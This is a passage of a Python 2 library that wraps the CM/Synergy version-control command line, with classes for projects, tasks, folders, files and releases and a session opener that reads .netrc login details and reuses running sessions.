        result = re.search(r"^(?P<type>Task|Folder)\s+(?P<instance>\w+)#(?P<id>\d+)$", fpn)
        if result != None:
            matches = result.groupdict()
            if matches["type"] == "Task":
                return "task%s-1:task:%s" % (matches["id"], matches["instance"])
            elif matches["type"] == "Folder":
                return "%s-1:folder:%s" % (matches['id'], matches['instance'])
        else:
            # 'project/version' release string
            result = re.search(r"^(?P<project>\S+)/(?P<version>\S+)$", fpn)
            if result != None:
                matches = result.groupdict()
                return "%s:%s:releasedef:1" % (matches['project'], matches['version'])
            else:
                # Check the name doesn't contains any of the following character: " :-"
                result = re.search(r"^[^\s^:^-]+$", fpn)
                if result != None:
                    return "none:%s:releasedef:1" % (fpn)
        raise InvalidFourPartNameException(fpn)

    name = property (__getname)
    version = property (__getversion)
    type = property (__gettype)
    instance = property (__getinstance)
    objectname = property (__getobjectname)
    family = property(__getfamily)
class CCMObject(FourPartName):
    """ Base class for any Synergy object. """

    def __init__(self, session, fpn):
        FourPartName.__init__(self, fpn)
        self._session = session

    def _getsession(self):
        """ Accessor for the 'session' property. """
        return self._session
    session = property(_getsession)

    def exists(self):
        """ Check if an the object exists in the database. """
        return (len(self._session.execute("query \"name='%s' and version='%s' and type='%s' and instance='%s'\" -u -f \"%%objectname\"" % (self.name, self.version, self.type, self.instance), ObjectListResult(self._session)).output) == 1)

    def __setitem__(self, name, value):
        """ Modify a Synergy attribute through the dictionary item interface. """
        project = ""
        if self.type == 'project':
            project = "-p"
        # a trailing backslash would escape the closing quote of the CLI
        # argument, so double it
        if value.endswith("\\"):
            value += "\\"
        result = self._session.execute("attribute -modify \"%s\" -v \"%s\" %s \"%s\"" % (name, value, project, self))
        if result.status != 0 and result.status is not None:
            raise CCMException("Error modifying '%s' attribute. Result: '%s'" % (name, result.output), result)

    def __getitem__(self, name):
        """ Provides access to Synergy object attributes through the dictionary
        item interface. Returns None for the '<void>' marker.
        """
        result = self._session.execute("query \"name='%s' and version='%s' and type='%s' and instance='%s'\" -u -f \"%%%s\"" % (self.name, self.version, self.type, self.instance, name), ResultWithError(self._session))
        if result.status != 0 and result.status is not None:
            raise CCMException("Error retrieving '%s' attribute. Result: '%s'" % (name, result.output), result)
        if len(result.error.strip()) > 0:
            raise CCMException("Error retrieving '%s' attribute. Reason: '%s'" % (name, result.error), result)
        if result.output.strip() == "<void>":
            return None
        return result.output.strip()

    def create_attribute(self, name, type_, value=None):
        """ Create a new attribute of the given type, optionally with a value. """
        if name in self.keys():
            raise CCMException("Attribute '%s' already exist." % (name))
        args = ""
        proj_arg = ""
        if value is not None:
            args += " -value \"%s\"" % value
        if self.type == "project":
            proj_arg = "-p"
        result = self._session.execute("attribute -create \"%s\" -type \"%s\" %s %s \"%s\"" % (name, type_, args, proj_arg, self.objectname))
        if result.status != 0 and result.status is not None:
            raise CCMException("Error creating '%s' attribute. Result: '%s'" % (name, result.output), result)

    def keys(self):
        """ The list of supported Synergy attributes. """
        result = self._session.execute("attribute -la \"%s\"" % self, AttributeNameListResult(self._session))
        return result.output

    def is_predecessor_of(self, o):
        """ Return True if self is a direct predecessor of o. """
        result = self._session.execute("query \"is_predecessor_of('%s') and name='%s'and version='%s'and type='%s'and instance='%s'\" -u -f \"%%objectname\"" % (o, self.name, self.version, self.type, self.instance), ObjectListResult(self._session))
        if len(result.output):
            return True
        return False

    def predecessors(self):
        """ Return the direct predecessors of this object. """
        result = self._session.execute("query \"is_predecessor_of('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
        return result.output

    def successors(self):
        """ Return the direct successors of this object. """
        result = self._session.execute("query \"is_successor_of('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
        return result.output

    def is_recursive_predecessor_of(self, o):
        """ Recursive predecessor check (one query per visited object). """
        result = self._session.execute("query \"has_predecessor('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
        for s in result.output:
            if s == o:
                return True
        for s in result.output:
            if s.is_recursive_predecessor_of(o):
                return True
        return False

    def is_recursive_predecessor_of_fast(self, o):
        """ Fast implementation of the recursive is_predecessor_of method. """
        input_objects = [self]
        while len(input_objects) > 0:
            query = " or ".join(["has_predecessor('%s')" % x for x in input_objects])
            # bugfix: the command string had no '%s' placeholder for the
            # query, so '%' formatting raised TypeError at runtime
            result = self._session.execute("query \"%s\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
            for s in result.output:
                if s == o:
                    return True
            # bugfix: advance the frontier; the original never updated
            # input_objects and looped forever when o was not found
            input_objects = result.output
        return False

    def is_recursive_sucessor_of(self, o):
        """ Recursive successor check (one query per visited object).
        (Name keeps the historical misspelling for caller compatibility.)
        """
        result = self._session.execute("query \"has_successor('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
        for s in result.output:
            if s == o:
                return True
        for s in result.output:
            if s.is_recursive_sucessor_of(o):
                return True
        return False

    def is_recursive_successor_of_fast(self, o):
        """ Fast implementation of the recursive is_successor_of method. """
        input_objects = [self]
        while len(input_objects) > 0:
            query = " or ".join(["has_successor('%s')" % x for x in input_objects])
            # bugfix: same missing '%s' placeholder as the predecessor variant
            result = self._session.execute("query \"%s\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
            for s in result.output:
                if s == o:
                    return True
            # bugfix: advance the frontier to terminate the search
            input_objects = result.output
        return False

    def relate(self, ccm_object):
        """ Create a 'successor' relationship from self to ccm_object. """
        # bugfix: '%' bound only to the string in the original, so execute()
        # received three positional arguments; format both names instead
        result = self._session.execute("relate -name successor -from \"%s\" -to \"%s\"" % (self, ccm_object), Result(self._session))
        if result.status is not None and result.status != 0:
            raise CCMException("Error relating objects %s to %s\n%s" % (self, ccm_object, result.output))

    def finduse(self):
        """ Tries to find where an object is used. """
        result = self._session.execute("finduse \"%s\"" % self, FinduseResult(self))
        return result.output
class File(CCMObject):
    """ Wrapper for any Synergy file object. """

    def __init__(self, session, fpn):
        CCMObject.__init__(self, session, fpn)

    def content(self):
        """ Return the raw content of the object via 'cat'. """
        return self._session.execute("cat \"%s\"" % self).output

    def to_file(self, path):
        """ Dump the object's content into the file at path, creating
        parent directories as needed.
        """
        if os.path.exists(path):
            _logger.error("Error file %s already exists" % path)
        parent = os.path.dirname(path)
        if not os.path.exists(parent):
            os.makedirs(parent)
        # Content to file
        result = self._session.execute("cat \"%s\" > \"%s\"" % (self, os.path.normpath(path)))
        if result.status not in (0, None):
            raise CCMException("Error retrieving content from object %s in %s (error status: %s)\n%s" % (self, path, result.status, result.output), result)

    def merge(self, ccm_object, task):
        """ Merge this object with ccm_object under the given task.
        Returns (merged_object, validity) where validity is 2 on clean
        merge, 1 on overlap warning, 0 otherwise.
        """
        assert ccm_object != None, "object must be defined."
        assert task != None, "task must be defined."
        assert task.type == "task", "task parameter must be of 'task' type."
        result = self._session.execute("merge -task %s \"%s\" \"%s\"" % (task['displayname'], self, ccm_object))
        validity = 0
        for line in result.output.splitlines():
            if re.match(r"Merge Source completed successfully\.", line):
                validity = 2
            elif re.match(r"Warning: Merge Source warning. \(overlaps during merge\)\.", line):
                validity = 1
            else:
                match = re.match(r"Associated object\s+(?P<object>.+)\s+with task", line)
                if match is not None:
                    return (self._session.create(match.groupdict()['object']), validity)
        raise CCMException("Error during merge operation.\n" + result.output, result)

    def checkin(self, state, comment=None):
        """ Check the object in to the given state. """
        comment = ("-c \"%s\"" % comment) if comment is not None else "-nc"
        result = self._session.execute("checkin -s \"%s\" %s \"%s\" " % (state, comment, self))
        pattern = r"Checked\s+in\s+'.+'\s+to\s+'%s'" % state
        for line in result.output.splitlines():
            _logger.debug(line)
            _logger.debug(pattern)
            if re.match(pattern, line) is not None:
                return
        raise CCMException("Error checking in object %s,\n%s" % (self, result.output), result)
class Project(CCMObject):
    """ Wrapper class for Synergy project object. """

    def __init__(self, session, fpn):
        CCMObject.__init__(self, session, fpn)
        # lazily-filled caches for the 'release' and 'baseline' properties
        self._release = None
        self._baseline = None

    def _gettasks(self):
        """ Accessor for the 'tasks' property: tasks from the update properties. """
        result = self._session.execute("rp -show tasks \"%s\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
        return result.output

    def add_task(self, task):
        """ Add a task to the update properties. """
        result = self._session.execute("up -add -task %s \"%s\"" % (task['displayname'], self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error adding task %s to project '%s'\n%s" % (task, self, result.output))

    def remove_task(self, task):
        """ Remove a task to the update properties. """
        result = self._session.execute("up -remove -task %s \"%s\"" % (task['displayname'], self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error removing task %s from project '%s'\n%s" % (task, self, result.output))

    def add_folder(self, folder):
        """ Add a folder to the update properties. """
        result = self._session.execute("up -add -folder %s \"%s\"" % (folder['displayname'], self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error adding folder %s to project '%s'\n%s" % (folder, self, result.output))

    def remove_folder(self, folder):
        """ Remove a folder to the update properties. """
        result = self._session.execute("up -remove -folder %s \"%s\"" % (folder['displayname'], self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error removing folder %s to project '%s'\n%s" % (folder, self, result.output))

    def _getfolders(self):
        """ Wrapper method to return the folder list from the update properties - please use the folders attribute to access it. """
        result = self._session.execute("up -show folders \"%s\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
        return result.output

    def _getsubprojects(self):
        """ Wrapper method to return the subprojects list - please use the subprojects attribute to access it. """
        result = self._session.execute("query -t project \"recursive_is_member_of('%s', none)\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
        return result.output

    def get_members(self, recursive=False, **kargs):
        """ Return project members, optionally recursively; extra keyword
        arguments are appended to the query as attribute='value' filters. """
        query = "is_member_of('%s')" % self.objectname
        if recursive:
            query = "recursive_is_member_of('%s', none)" % self.objectname
        for k in kargs.keys():
            query += " and %s='%s'" % (k, kargs[k])
        result = self._session.execute("query \"%s\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
        return result.output

    def _getrelease(self):
        """ Get the release of the current object. Returns a Releasedef object. """
        # note: re-queried on every access; self._release is only a cache
        # of the last lookup
        self._release = Releasedef(self._session, self['release'])
        return self._release

    def _setrelease(self, release):
        """ Set the release of the current object. """
        self['release'] = release['displayname']

    def refresh(self):
        """ Refresh project update properties. """
        result = self._session.execute("up -refresh \"%s\"" % self.objectname, UpdatePropertiesRefreshResult(self._session))
        return result.output

    def _getbaseline(self):
        """ Get the baseline of the current project. """
        if self._baseline == None:
            result = self._session.execute("up -show baseline_project \"%s\" -f \"%%displayname\" -u" % self.objectname)
            # the CLI reports the no-baseline case as a message on output
            if result.output.strip().endswith('does not have a baseline project.'):
                return None
            self._baseline = self._session.create(result.output)
        _logger.debug('baseline: %s' % self._baseline)
        return self._baseline

    def set_baseline(self, baseline, recurse=False):
        """ Set project baseline. raise a CCMException in case or error. """
        args = ""
        if recurse:
            args += " -r"
        # invalidate the cached baseline before changing it
        self._baseline = None
        result = self._session.execute("up -mb \"%s\" %s \"%s\"" % (baseline, args, self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error setting basline of project '%s'\n%s" % (self.objectname, result.output))

    def set_update_method(self, name, recurse = False):
        """ Set the update method for the project (and subproject if recurse is True). """
        assert name != None, "name must not be None."
        assert len(name) > 0, "name must not be an empty string."
        args = "-ru %s" % name
        if recurse:
            args += " -r"
        result = self._session.execute("up %s \"%s\"" % (args, self))
        if result.status != None and result.status != 0:
            raise CCMException("Error setting reconfigure properties to %s for project '%s'\nStatus: %s\n%s" % (name, self.objectname, result.status, result.output))

    def apply_update_properties(self, baseline = True, tasks_and_folders = True, recurse=True):
        """ Apply update properties to subprojects. """
        args = ""
        if not baseline:
            args += "-no_baseline"
        if not tasks_and_folders:
            args += " -no_tasks_and_folders"
        if recurse:
            args += " -apply_to_subprojs"
        result = self._session.execute("rp %s \"%s\"" % (args, self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error applying update properties to subprojects for '%s'\n%s" % (self.objectname, result.output))

    def root_dir(self):
        """ Return the directory attached to a project. """
        result = self._session.execute("query \"is_child_of('%s','%s')\" -u -f \"%%objectname\"" % (self.objectname, self.objectname), ObjectListResult(self._session))
        return result.output[0]

    def snapshot(self, targetdir, recursive=False):
        """ Take a snapshot of the project. """
        assert targetdir != None, "targetdir must be defined."
        if recursive:
            recursive = "-recurse"
        else:
            recursive = ""
        result = self._session.execute("wa_snapshot -path \"%s\" %s \"%s\"" % (os.path.normpath(targetdir), recursive, self.objectname))
        # success is detected from the CLI's completion message
        for line in result.output.splitlines():
            if re.match(r"^Creation of snapshot work area complete.|Copying to file system complete\.\s*$", line):
                return result.output
        raise CCMException("Error creation snapshot of %s,\n%s" % (self.objectname, result.output), result)

    def checkout(self, release, version=None, purpose=None, subprojects=True):
        """ Create a checkout of this project.

        This will only checkout the project in Synergy. It does not create a work area.

        :param release: The Synergy release tag to use.
        :param version: The new version to use for the project. This is applied to all subprojects.
        :param purpose: The purpose of the checkout. Determines automatically the role from the purpose
            and switch it automatically (Could be any role from the DB).
        """
        assert release != None, "Release object must be defined."
        if not release.exists():
            raise CCMException("Release '%s' must exist in the database." % release)
        args = ''
        if version != None:
            args += '-to "%s"' % version
        role = None
        if purpose:
            #save current role before changing
            role = self._session.role
            self._session.role = get_role_for_purpose(self._session, purpose)
            args += " -purpose \"%s\"" % purpose
        if subprojects:
            args += " -subprojects"
        result = self._session.execute("checkout -project \"%s\" -release \"%s\" -no_wa %s" \
            % (self, release['displayname'], args), ProjectCheckoutResult(self._session, self.objectname))
        # restore the role saved before the purpose-driven switch
        if not role is None:
            self._session.role = role
        if result.project == None:
            raise CCMException("Error checking out project %s,\n%s" % (self.objectname, result.output), result)
        return result

    def work_area(self, maintain, recursive=None, relative=None, path=None, pst=None, wat=False):
        """ Configure the work area. This allow to enable it or disable it, set the path, recursion... """
        args = ""
        if maintain:
            args += "-wa"
        else:
            args += "-nwa"
        # path
        if path != None:
            args += " -path \"%s\"" % path
        # pst
        if pst != None:
            args += " -pst \"%s\"" % pst
        # relative
        if relative != None and relative:
            args += " -relative"
        elif relative != None and not relative:
            args += " -not_relative"
        # recursive
        if recursive != None and recursive:
            args += " -recurse"
        elif recursive != None and not recursive:
            args += " -no_recurse"
        #wat
        if wat:
            args += " -wat"
        result = self._session.execute("work_area -project \"%s\" %s" \
            % (self.objectname, args), Result(self._session))
        return result.output

    def update(self, recurse=True, replaceprojects=True, keepgoing=False, result=None):
        """ Update the project based on its reconfigure properties. """
        args = ""
        if recurse:
            args += " -r "
        if replaceprojects:
            args += " -rs "
        else:
            args += " -ks "
        if result == None:
            result = UpdateResult(self._session)
        result = self._session.execute("update %s -project %s" % (args, self.objectname), result)
        if not result.successful and not keepgoing:
            raise CCMException("Error updating %s" % (self.objectname), result)
        return result

    def reconcile(self, updatewa=True, recurse=True, consideruncontrolled=True, missingwafile=True, report=True):
        """ Reconcile the project to force the work area to match the database. """
        args = ""
        if updatewa:
            args += " -update_wa "
        if recurse:
            args += " -recurse "
        if consideruncontrolled:
            args += " -consider_uncontrolled "
        if missingwafile:
            args += " -missing_wa_file "
        if report:
            args += " -report reconcile.txt "
        result = self._session.execute("reconcile %s -project %s" % (args, self.objectname), Result(self._session))
        # either message indicates a successful reconcile
        if re.search(r"There are no conflicts in the Work Area", result.output) == None and re.search(r"Reconcile completed", result.output) == None:
            raise CCMException("Error reconciling %s,\n%s" % (self.objectname, result.output), result)
        return result.output

    def get_latest_baseline(self, filterstring="*", state="released"):
        """ Return the displayname of the newest project version matching
        filterstring in the given state (last line of the sorted query). """
        result = self._session.execute("query -n %s -t project -f \"%%displayname\" -s %s -u -ns \"version smatch'%s'\"" % (self.name, state, filterstring))
        lines = result.output.splitlines()
        return lines[-1]

    def create_baseline(self, baseline_name, release, baseline_tag, purpose="System Testing", state="published_baseline"):
        """ Create a baseline from this project and return the CLI output. """
        result = self._session.execute("baseline -create %s -release %s -purpose \"%s\" -vt %s -project \"%s\" -state \"%s\"" % (baseline_name, release, purpose, baseline_tag, self.objectname, state))
        return result.output

    def sync(self, recurse=False, static=False):
        """ Synchronize project content. By default it is not been done recusively. (Not unittested)"""
        args = ""
        if recurse:
            args += " -recurse"
        if static:
            args += " -static"
        result = self._session.execute("sync %s -project \"%s\"" % (args, self.objectname))
        if result.status != None and result.status != 0:
            raise CCMException("Error during synchronization of %s: %s." % (self.objectname, result.output))
        return result.output

    def conflicts(self, recurse=False, tasks=False):
        """ Run conflict detection on the project and return the parsed result. """
        args = "-noformat "
        if recurse:
            args += " -r"
        if tasks:
            args += " -t"
        result = self._session.execute("conflicts %s \"%s\"" % (args, self.objectname), ConflictsResult(self._session))
        if result.status != None and result.status != 0:
            raise CCMException("Error during conflict detection of %s: %s." % (self.objectname, result))
        return result

    tasks = property(_gettasks)
    folders = property(_getfolders)
    subprojects = property(_getsubprojects)
    release = property(_getrelease, _setrelease)
    baseline = property(_getbaseline, set_baseline)
class Dir(CCMObject):
    """ Wrapper class for Synergy dir object. """

    def __init__(self, session, fpn):
        CCMObject.__init__(self, session, fpn)

    def children(self, project):
        """ Return the objects that are children of this dir within project. """
        assert(project.type == 'project')
        command = "query \"is_child_of('%s','%s')\" -u -f \"%%objectname\"" % (self.objectname, project)
        return self._session.execute(command, ObjectListResult(self._session)).output
class Releasedef(CCMObject):
    """ Wrapper class for Synergy releasedef object. """

    def __init__(self, session, fpn):
        CCMObject.__init__(self, session, fpn)

    def _getcomponent(self):
        """ Accessor for the 'component' property: the name part of the release. """
        return self.name

    component = property(_getcomponent)
class Folder(CCMObject):
    """ Wrapper class for Synergy folder object """

    def __init__(self, session, fpn):
        CCMObject.__init__(self, session, fpn)

    def _gettasks(self):
        """ Accessor for 'tasks' property. """
        result = self._session.execute("folder -show tasks \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
        return result.output

    def _getobjects(self):
        """ Accessor for 'objects' property: the objects in the folder. """
        result = self._session.execute("folder -show objects \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
        return result.output

    def _getmode(self):
        """ Get the mode used by the folder. """
        result = self._session.execute("folder -show mode \"%s\"" % self.objectname)
        return result.output.strip()

    def _getquery(self):
        """ Get the query that populate the folder. """
        if self.mode.lower() == "query":
            result = self._session.execute("folder -show query \"%s\"" % self.objectname)
            return result.output.strip()
        else:
            raise CCMException("%s is not a query base folder." % (self.objectname))

    def _getdescription(self):
        """ Get the description associated with the folder. """
        r = self._session.execute("query -t folder -n %s -i %s -u -f \"%%description\"" % (self.name, self.instance))
        return r.output.strip()

    def remove(self, task):
        """ Remove task from this folder. """
        result = self._session.execute("folder -m \"%s\" -remove_task \"%s\"" % (self.objectname, task.objectname))
        if result.status is not None and result.status != 0:
            raise CCMException("Error removing task %s from %s: %s." % (task.objectname, self.objectname, result.output))

    def update(self):
        """ Refresh the folder content from its query/criteria. """
        # bugfix: the original command string contained no '%s' placeholder
        # ("folder -m -update -f \"%%objectname\"" % self.objectname), so the
        # '%' formatting raised TypeError before the command could run; name
        # the folder the same way the other -m subcommands do
        result = self._session.execute("folder -m \"%s\" -update" % self.objectname)
        if result.status is not None and result.status != 0:
            raise CCMException("Error updating the folder content %s: %s." % (self.objectname, result.output))

    def append(self, task):
        """ Add a task to this folder. """
        class AddTaskException(CCMException):
            def __init__(self, reason, task, result):
                CCMException.__init__(self, reason, result)
                self.task = task
        result = self._session.execute("folder -m -at \"%s\" \"%s\"" % (task.objectname, self.objectname))
        if re.search(r"(Added 1 task to)|(is already in folder)", result.output, re.M) is None:
            # bugfix: arguments were passed as (reason, result, task), which
            # stored the Result in .task and the task object as the result
            raise AddTaskException(result.output, task, result)

    def copy(self, existing_folder):
        """ Copy the contents of existing_folder into this folder.

        This appends to the destination folder by default.

        :param existing_folder: The destination Folder object.
        """
        result = self._session.execute("folder -copy %s -existing %s -append" % (self.objectname, existing_folder), FolderCopyResult(self._session))
        return result.output

    objects = property(_getobjects)
    tasks = property(_gettasks)
    mode = property(_getmode)
    query = property(_getquery)
    is_query_based = property(lambda x: x.mode.lower() == "query")
    description = property(_getdescription)
class Task(CCMObject):
    """ Wrapper class for Synergy task object """

    def __init__(self, session, fpn):
        CCMObject.__init__(self, session, fpn)
        # Lazily-built cache for __unicode__().
        self.__unicode_str_text = None

    def _getobjects(self):
        """ Accessor for 'objects' property: all objects associated with the task. """
        result = self._session.execute("task -show objects \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
        return result.output

    def append(self, ccm_object):
        """ Associate an object to a task """
        class AddObjectException(CCMException):
            def __init__(self, comment, ccm_object):
                CCMException.__init__(self, comment)
                self.ccm_object = ccm_object
        result = self._session.execute("task -associate \"%s\" -object \"%s\"" % (self.objectname, ccm_object.objectname))
        if not re.match(r"Associated object .+ with task .*\.", result.output, re.M):
            # BUG FIX: AddObjectException requires (comment, ccm_object); the
            # original raise passed only the comment, so a failed association
            # crashed with TypeError instead of raising the intended exception.
            raise AddObjectException(result.output, ccm_object)

    def assign(self, username):
        """ Change the resolver of the task to *username*. """
        result = self._session.execute("task -modify \"%s\" -resolver %s" % (self.objectname, username))
        if not re.match(r"Changed resolver of task", result.output, re.M):
            raise CCMException("Error assigning task to user '%s',\n%s" % (username, result.output), result)

    def _getsynopsis(self):
        # Plain attribute lookup through the CCMObject item protocol.
        return self['task_synopsis']

    @staticmethod
    def create(session, release_tag, synopsis=""):
        """ Create a new task for the given releasedef wrapper. """
        assert release_tag.type == "releasedef", "release_tag must be a CCM object wrapper of releasedef type"
        result = session.execute("task -create -synopsis \"%s\" -release \"%s\"" % (synopsis, release_tag['displayname']), CreateNewTaskResult(session))
        return result.output

    objects = property(_getobjects)

    def __unicode__(self):
        # TODO: use optimised query that makes only 1 ccm query with suitable format
        if self.__unicode_str_text == None:
            self.__unicode_str_text = u'%s: %s' % (self['displayname'], self['task_synopsis'])
        return self.__unicode_str_text

    def __str__(self):
        # Python 2 semantics: returns an ascii-encoded byte string.
        return self.__unicode__().encode('ascii', 'replace')

    def get_release_tag(self):
        """ Get task release. Use release property!"""
        result = self._session.execute("attribute -show release \"%s\"" % (self.objectname), Result(self._session))
        return result.output

    def set_release_tag(self, release_tag):
        """ Set task release. Use release property!"""
        result = self._session.execute("attribute -modify release -value \"%s\" \"%s\"" % (release_tag, self.objectname), Result(self._session))
        return result.output

    release = property(get_release_tag, set_release_tag)
class UpdateTemplate:
    """ Allow to access Update Template property using Release and Purpose. """
    def __init__(self, releasedef, purpose):
        # An update template is identified by a release definition plus a
        # purpose name; both are mandatory.
        assert(releasedef != None)
        assert(purpose != None)
        self._releasedef = releasedef
        self._purpose = purpose

    def objectname(self):
        """ Return the objectname representing this virtual object. """
        return "%s:%s" % (self._releasedef['displayname'], self._purpose)

    def baseline_projects(self):
        """ Query all projects for this UpdateTemplate. """
        result = self._releasedef.session.execute("ut -sh baseline_projects \"%s\"" % self.objectname(), ObjectListResult(self._releasedef.session))
        # Python 2 print statement: this module is Python 2 code.
        print result.output
        return result.output

    def information(self):
        """ Query the 'information' section of this UpdateTemplate. """
        result = self._releasedef.session.execute("ut -sh information \"%s\"" % self.objectname(), UpdateTemplateInformation(self._releasedef.session))
        print result.output
        return result.output

    def baseline_selection_mode(self):
        """ The current Baseline selection mode """
        result = self._releasedef.session.execute("ut -sh bsm \"%s\"" % self.objectname())
        print result.output.strip()
        return result.output.strip()
def read_ccmwaid_info(filename):
    """ Read data from a ccmwaid file. This method is an helper to retreive a project from a physical location.

    The file layout is three lines: the database path, a timestamp, and the
    object reference.

    :param filename: path to the ccmwaid file.
    :return: dict with 'dbpath', 'database' and 'objectname' keys.
    """
    # 'with' guarantees the handle is closed even when a read fails
    # (the original left the file open on error).
    with open(filename, 'r') as ccmwaid:
        # first line: database
        dbpath = os.path.dirname(ccmwaid.readline().strip())
        database = os.path.basename(dbpath)
        # 2nd line should be a timestamp
        ccmwaid.readline().strip()
        # 3rd line is the objectname
        objectref = ccmwaid.readline().strip()
    return {'dbpath': dbpath, 'database': database, 'objectname': objectref}
def create_project_from_path(session, path):
    """ Uses the (_|.)ccmwaid.inf file to create a Project object.

    :param session: active Session used to instantiate the object.
    :param path: directory of a Synergy work area.
    :return: the created object, or None when no ccmwaid file exists.
    """
    ccmwaid = ".ccmwaid.inf"
    if os.name == 'nt':
        ccmwaid = "_ccmwaid.inf"
    # os.path.join is portable, unlike the original "/" string concatenation.
    ccmwaid_path = os.path.join(path, ccmwaid)
    if not os.path.exists(ccmwaid_path):
        return None
    result = read_ccmwaid_info(ccmwaid_path)
    return session.create(result['objectname'])
def open_session(username=None, password=None, engine=None, dbpath=None, database=None, reuse=True):
    """Provides a Session object.

    Attempts to return a Session, based either on existing Synergy
    sessions or by creating a new one.
      - If a .netrc file can be found on the user's personal drive,
        that will be read to obtain Synergy login information if it
        is defined there. This will be used to fill in any missing
        parameters not passed in the call to open_session().

        The format of the .netrc file entries should be:

        machine synergy login USERNAME password foobar account DATABASE_PATH@SERVER

        If the details refer to a specific database, the machine can be the database name,
        instead of "synergy".
      - If an existing session is running that matches the supplied
        parameters, it will reuse that.

    :param username: Synergy user; filled from .netrc or the USERNAME env var when None.
    :param password: when given, a brand new session is always started.
    :param engine: engine host; filled from .netrc or the GSCM database when None.
    :param dbpath: database path; filled from .netrc or the GSCM database when None.
    :param database: database name, used for .netrc/GSCM lookups and router switching.
    :param reuse: when True (and no password given), reuse a running session if any.
    :raises CCMException: when ccm is not installed or no session can be provided.
    """
    # See if a .netrc file can be used
    if CCM_BIN == None:
        raise CCMException("Could not find CM/Synergy executable in the path.")
    if password == None or username == None or engine == None or dbpath == None:
        if os.sep == '\\':
            # NOTE(review): assumes the personal drive is mapped to H: on Windows -- confirm.
            os.environ['HOME'] = "H:" + os.sep
        _logger.debug('Opening .netrc file')
        try:
            netrc_file = netrc.netrc()
            netrc_info = None
            # If settings for a specific database
            if database != None:
                netrc_info = netrc_file.authenticators(database)
            # if not found just try generic one
            if netrc_info == None:
                netrc_info = netrc_file.authenticators('synergy')
            if netrc_info != None:
                (n_username, n_account, n_password) = netrc_info
                if username == None:
                    username = n_username
                if password == None:
                    password = n_password
                # The .netrc 'account' field packs "dbpath@engine".
                if n_account != None:
                    (n_dbpath, n_engine) = n_account.split('@')
                    if dbpath == None and n_dbpath is not None:
                        _logger.info('Database path set using .netrc (%s)' % n_dbpath)
                        dbpath = n_dbpath
                    if engine == None and n_engine is not None:
                        _logger.info('Database engine set using .netrc (%s)' % n_engine)
                        engine = n_engine
        except IOError:
            _logger.debug('Error accessing .netrc file')
        # last chance...
        if username == None:
            username = os.environ['USERNAME']
    # looking for dbpath using GSCM database
    if dbpath == None and database != None:
        _logger.info('Database path set using the GSCM database.')
        dbpath = nokia.gscm.get_db_path(database)
    # looking for engine host using GSCM database
    if engine == None and database != None:
        _logger.info('Database engine set using the GSCM database.')
        engine = nokia.gscm.get_engine_host(database)
    _sessions = []
    # See if any currently running sessions can be used, only if no password submitted, else use a brand new session!
    if password == None and reuse:
        _logger.debug('Querying for existing Synergy sessions')
        command = "%s status" % (CCM_BIN)
        pipe = os.popen(command, 'r')
        result = pipe.read()
        pipe.close()
        _logger.debug('ccm status result: ' + result)
        for match in re.finditer(r'(?P<ccmaddr>\w+:\d+:\d+.\d+.\d+.\d+(:\d+.\d+.\d+.\d+)?)(?P<current_session>\s+\(current\s+session\))?\nDatabase:\s*(?P<dbpath>\S+)', result, re.M):
            d = match.groupdict()
            _logger.debug(d['ccmaddr'])
            _logger.debug(socket.gethostname())
            _logger.debug(d['current_session'])
            # Only sessions running on this host can be reused.
            if d['ccmaddr'].lower().startswith(socket.gethostname().lower()):
                # These session objects should not close the session on deletion,
                # because they did not initially create the session
                existing_session = Session(username, engine, d['dbpath'], d['ccmaddr'], close_on_exit=False)
                _logger.debug('Existing session found: %s' % existing_session)
                _sessions.append(existing_session)
        # looking for session using dbpath
        for session in _sessions:
            if session.dbpath == dbpath:
                return session
    else:
        # looking for router address using GSCM database
        router_address = None
        if database == None and dbpath != None:
            database = os.path.basename(dbpath)
        # Serialize session creation across processes on this machine.
        lock = fileutils.Lock(CCM_SESSION_LOCK)
        try:
            lock.lock(wait=True)
            # if we have the database name we can switch to the correct Synergy router
            if database != None:
                _logger.info('Getting router address.')
                router_address = nokia.gscm.get_router_address(database)
                # On Windows, rewrite _router.adr next to the ccm install when it differs.
                if os.sep == '\\' and router_address != None:
                    routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), 'r')
                    current_router = routerfile.read().strip()
                    routerfile.close()
                    if current_router != router_address.strip():
                        _logger.info('Updating %s' % (os.path.normpath(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"))))
                        routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), "w+")
                        routerfile.write("%s\n" % router_address)
                        routerfile.close()
            # If no existing sessions were available, start a new one
            _logger.info('Opening session.')
            new_session = Session.start(username, password, engine, dbpath)
            lock.unlock()
            return new_session
        finally:
            # NOTE(review): unlock may run a second time on success --
            # presumably fileutils.Lock tolerates redundant unlocks; confirm.
            lock.unlock()
    # Reached only when reuse was requested but no running session matched dbpath.
    raise CCMException("Cannot open session for user '%s'" % username)
def get_role_for_purpose(session, purpose):
    """ return role needed to modify project with checkout for purpose. """
    known_purposes = session.purposes()
    if purpose not in known_purposes:
        raise CCMException("Could not find purpose '%s' in the database.\n Valid purpose are: %s." % (purpose, ','.join(known_purposes.keys())))
    # Only 'prep' purposes require build manager rights.
    if known_purposes[purpose]['status'] == 'prep':
        return 'build_mgr'
    return 'developer'
def get_role_for_status(session, status):
    """ return role needed to modify project with a specific status.

    :param session: unused; kept for interface compatibility.
